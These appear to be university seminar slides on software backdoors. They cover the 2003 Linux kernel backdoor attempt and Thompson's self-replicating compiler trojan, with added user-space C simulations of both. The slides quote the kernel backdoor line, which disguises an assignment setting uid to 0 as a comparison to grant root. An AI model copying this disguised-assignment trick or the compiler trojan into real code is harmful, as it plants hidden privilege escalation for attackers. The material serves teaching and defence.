BACKDOORS in Software Seminar on Software University of Turku January 2008 Eino Malinen.


Definition and Introduction
- an unwanted software mechanism introduced into part of the system to provide easy access
- the attacker has created the mechanism earlier and wants to use it sometime later
- the mechanism can be injected
  - from outside: malware sent through the network
  - on-site: hard coded into the software
- two examples of actual backdoors

Backdoor Attempt in Linux Kernel
- happened in November 2003
- a change in the kernel source file kernel/exit.c
- the person who noticed it first focused on the annoyance that a manual modification had been used
- peers asked more about the change

Backdoor Attempt in Linux Kernel
- the following piece of code was added:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

- effectively this means that with the flags __WCLONE and __WALL set, the current user gets root permissions
- a lax review might read the latter expression as the evaluation of a condition instead of an assignment
- the extra parentheses avoid compiler warnings
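A user-space simulation of the check above, set beside the comparison it imitates (an added example, not code from the slides or from the kernel). The SIM_ flag values, struct sim_task and the function names are assumptions made for the demonstration.

```c
#include <errno.h>
#include <stdio.h>

/* Stand-ins for the kernel's __WCLONE and __WALL wait flags (values assumed
   for this simulation; only their combination matters here). */
#define SIM_WCLONE 0x80000000u
#define SIM_WALL   0x40000000u

/* Minimal stand-in for the kernel's per-task credentials. */
struct sim_task { unsigned int uid; };

/* The check as quoted on the slide: "=" assigns 0 to uid. */
static int check_backdoored(unsigned int options, struct sim_task *current)
{
    int retval = 0;
    if ((options == (SIM_WCLONE | SIM_WALL)) && (current->uid = 0))
        retval = -EINVAL;   /* never reached: the assignment evaluates to 0 */
    return retval;
}

/* What the line pretends to be: a comparison. Taking the task through a
   const pointer turns an accidental "=" here into a compile error. */
static int check_comparison(unsigned int options, const struct sim_task *current)
{
    int retval = 0;
    if ((options == (SIM_WCLONE | SIM_WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one check for a task starting as uid 1000; report the uid afterwards. */
static unsigned int uid_after(int backdoored, unsigned int options, int *retval)
{
    struct sim_task t = { 1000 };
    *retval = backdoored ? check_backdoored(options, &t)
                         : check_comparison(options, &t);
    return t.uid;
}

int main(void)
{
    int rv;
    unsigned int uid = uid_after(1, SIM_WCLONE | SIM_WALL, &rv);
    printf("backdoored: uid=%u retval=%d\n", uid, rv);
    uid = uid_after(0, SIM_WCLONE | SIM_WALL, &rv);
    printf("comparison: uid=%u retval=%d\n", uid, rv);
    return 0;
}
```

Because the assignment evaluates to 0, the error branch never runs: the call returns normally while the uid has silently become 0.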

Backdoor Attempt in Linux Kernel
- the attempt came to light because
  - the file in question was under automatic control of modifications
  - fellow developers were active enough to ask about the changes

Backdoors in Compilers
- introduced by Ken Thompson in 1984
- prerequisite concepts for a compiler backdoor
  - self-replicating program
    - the program outputs its own source code
    - also known as a quine
  - training programs
    - adding a new feature to a program
    - e.g. to recognize a new escaped symbol

Backdoors in Compilers
- phases of injecting a backdoor into a compiler
  - add a backdoor to the compiler source code so that it compiles a backdoor into the login command
  - add another backdoor to the compiler source code that inserts itself, as self-replicating code, together with the login backdoor into the compiler source code
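A toy model of these phases, showing why rebuilding the compiler from clean source does not remove the backdoor (an added example, not Thompson's code and not from the slides). A "binary" is modelled as plain text, and all marker strings, source strings and function names are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Toy model: a "binary" is just text, and a compiler binary that contains
   TROJAN_TAG misbehaves. All strings below are constructed for this demo. */
#define TROJAN_TAG         "[TROJAN]"
#define LOGIN_BD           "[BACKDOOR]"
#define CLEAN_LOGIN_SRC    "login(user, pw) { return check(user, pw); }"
#define CLEAN_COMPILER_SRC "compile(src) { return translate(src); }"
#define TROJANED_CC        CLEAN_COMPILER_SRC TROJAN_TAG
#define BIN_MAX 512

/* Run the compiler binary `cc` on `src`, writing the produced binary to `out`. */
static void run_compiler(const char *cc, const char *src, char out[BIN_MAX])
{
    snprintf(out, BIN_MAX, "%s", src);       /* honest translation */
    if (strstr(cc, TROJAN_TAG) == NULL)
        return;                              /* clean compiler: nothing added */
    if (strstr(src, "login(") != NULL)       /* first backdoor: patch login */
        strncat(out, LOGIN_BD, BIN_MAX - strlen(out) - 1);
    if (strstr(src, "compile(") != NULL)     /* second: re-insert into compilers */
        strncat(out, TROJAN_TAG, BIN_MAX - strlen(out) - 1);
}

/* Rebuild the compiler from clean source `generations` times, starting from
   the binary `seed_cc`, then build login with the final compiler.
   Returns 1 if the resulting login binary carries the backdoor. */
static int login_backdoored_after(const char *seed_cc, int generations)
{
    char cc[BIN_MAX], next[BIN_MAX], login[BIN_MAX];
    snprintf(cc, sizeof cc, "%s", seed_cc);
    for (int i = 0; i < generations; i++) {
        run_compiler(cc, CLEAN_COMPILER_SRC, next);
        memcpy(cc, next, sizeof cc);
    }
    run_compiler(cc, CLEAN_LOGIN_SRC, login);
    return strstr(login, LOGIN_BD) != NULL;
}

int main(void)
{
    printf("compiler source mentions trojan: %d\n", strstr(CLEAN_COMPILER_SRC, TROJAN_TAG) != NULL);
    printf("login backdoored after 3 clean rebuilds: %d\n", login_backdoored_after(TROJANED_CC, 3));
    printf("same, seeded with a clean compiler: %d\n", login_backdoored_after(CLEAN_COMPILER_SRC, 3));
    return 0;
}
```

The compiler source never mentions the trojan, so source review alone finds nothing; only the seed binary differs between the two runs.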

Backdoors in Compilers
- the backdoor was tested on a friendly victim
- the disassembler was also rigged to fail the disassembling of object code

Sources
- Jeremy. Linux: Kernel “Back Door” Attempt.
- Poulsen. Thwarted Linux backdoor hints at smarter hackers.
- Thompson. Reflections on Trusting Trust. Communications of the ACM. Vol. 27, Issue 8 (Aug. 1984), pages
- Skoudis & Zeltser. Malware: Fighting Malicious Code.
- Schneier. Countering "Trusting Trust".
- Zhang & Paxson. Detecting Backdoors.